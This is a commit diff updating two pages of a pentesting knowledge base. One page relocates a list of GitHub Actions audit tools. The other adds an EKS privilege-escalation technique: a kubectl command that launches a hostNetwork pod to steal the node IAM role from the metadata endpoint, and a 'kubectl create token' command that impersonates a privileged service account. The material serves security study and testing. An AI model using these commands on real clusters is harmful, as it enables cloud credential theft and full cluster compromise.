Skip to content

Commit d034181

Browse files
committed
a
1 parent f259961 commit d034181

File tree

2 files changed

+35
-12
lines changed

2 files changed

+35
-12
lines changed

src/pentesting-ci-cd/github-security/abusing-github-actions/README.md

Lines changed: 10 additions & 9 deletions
Original file line numberDiff line numberDiff line change
@@ -2,6 +2,16 @@
22

33
{{#include ../../../banners/hacktricks-training.md}}
44

5+
## Tools
6+
7+
The following tools are useful to find Github Action workflows and even find vulnerable ones:
8+
9+
- [https://github.com/CycodeLabs/raven](https://github.com/CycodeLabs/raven)
10+
- [https://github.com/praetorian-inc/gato](https://github.com/praetorian-inc/gato)
11+
- [https://github.com/AdnaneKhan/Gato-X](https://github.com/AdnaneKhan/Gato-X)
12+
- [https://github.com/carlospolop/PurplePanda](https://github.com/carlospolop/PurplePanda)
13+
- [https://github.com/zizmorcore/zizmor](https://github.com/zizmorcore/zizmor) - Check also its checklist in [https://docs.zizmor.sh/audits](https://docs.zizmor.sh/audits)
14+
515
## Basic Information
616

717
In this page you will find:
@@ -569,15 +579,6 @@ An organization in GitHub is very proactive in reporting accounts to GitHub. All
569579
> [!WARNING]
570580
> The only way for an organization to figure out they have been targeted is to check GitHub logs from SIEM since from GitHub UI the PR would be removed.
571581

572-
## Tools
573-
574-
The following tools are useful to find Github Action workflows and even find vulnerable ones:
575-
576-
- [https://github.com/CycodeLabs/raven](https://github.com/CycodeLabs/raven)
577-
- [https://github.com/praetorian-inc/gato](https://github.com/praetorian-inc/gato)
578-
- [https://github.com/AdnaneKhan/Gato-X](https://github.com/AdnaneKhan/Gato-X)
579-
- [https://github.com/carlospolop/PurplePanda](https://github.com/carlospolop/PurplePanda)
580-
581582
{{#include ../../../banners/hacktricks-training.md}}
582583

583584

src/pentesting-cloud/kubernetes-security/kubernetes-pivoting-to-clouds.md

Lines changed: 25 additions & 3 deletions
Original file line numberDiff line numberDiff line change
@@ -287,11 +287,18 @@ for ns in `kubectl get namespaces -o custom-columns=NAME:.metadata.name | grep -
287287
done | grep -B 1 "amazonaws.com"
288288
```
289289

290-
### Node IAM Role
290+
### Node IAM Role to cluster-admin
291291

292-
The previos section was about how to steal IAM Roles with pods, but note that a **Node of the** K8s cluster is going to be an **instance inside the cloud**. This means that the Node is highly probable going to **have a new IAM role you can steal** (_note that usually all the nodes of a K8s cluster will have the same IAM role, so it might not be worth it to try to check on each node_).
292+
The previos section was about how to steal IAM Roles with pods, but note that a **Node of the** K8s cluster is going to be an **instance inside the cloud**. This means that the Node is highly probable going to **have an IAM role you can steal** (_note that usually all the nodes of a K8s cluster will have the same IAM role, so it might not be worth it to try to check on each node_).
293293

294-
There is however an important requirement to access the metadata endpoint from the node, you need to be in the node (ssh session?) or at least have the same network:
294+
To access the node metadata endpoint you need to:
295+
- Be in a pod and have the metadata endpoint configured to at least 2 tcp hops. This is the most common misconfiguration as usually different pods in the cluster will require access to the metadata endpoint to not break and several companies just decide to allow access to the metadata endpoint from all the pods in the cluster.
296+
- Be in a pod with `hostNetwork` enabled.
297+
- Escape to the node and access the metadata endpoint directly.
298+
299+
(Note that the metadata endpoint is at 169.254.169.254 as always).
300+
301+
To **escape to the node** you can use the following command to run a pod with `hostNetwork` enabled:
295302

296303
```bash
297304
kubectl run NodeIAMStealer --restart=Never -ti --rm --image lol --overrides '{"spec":{"hostNetwork": true, "containers":[{"name":"1","image":"alpine","stdin": true,"tty":true,"imagePullPolicy":"IfNotPresent"}]}}'
@@ -314,6 +321,21 @@ if [ "$IAM_ROLE_NAME" ]; then
314321
fi
315322
```
316323

324+
### Privesc to cluster-admin
325+
326+
Iin summary: if it's possible to **access the EKS Node IAM role** from a pod, it's possible to **compromise the full kubernetes cluster**.
327+
328+
For more info check [this post](https://blog.calif.io/p/privilege-escalation-in-eks). As summary, the default IAM EKS role that is assigned to the EKS nodes by default is assigned the role `system:node` inside the cluster. This role is very interesting although is limited by the kubernetes [**Node Restrictions**](https://kubernetes.io/docs/reference/access-authn-authz/admission-controllers/#noderestriction).
329+
330+
However, the node can always **generate tokens for service accounts** running in pods inside the node. So, if the node is running a pod with a privileged service account, the node can generate a token for that service account and use it to impersonate the service account like in:
331+
332+
```bash
333+
kubectl --context=node1 create token -n ns1 sa-priv \
334+
--bound-object-kind=Pod \
335+
--bound-object-name=pod-priv \
336+
--bound-object-uid=7f7e741a-12f5-4148-91b4-4bc94f75998d
337+
```
338+
317339
## References
318340

319341
- [https://cloud.google.com/kubernetes-engine/docs/how-to/workload-identity](https://cloud.google.com/kubernetes-engine/docs/how-to/workload-identity)

0 commit comments

Comments
 (0)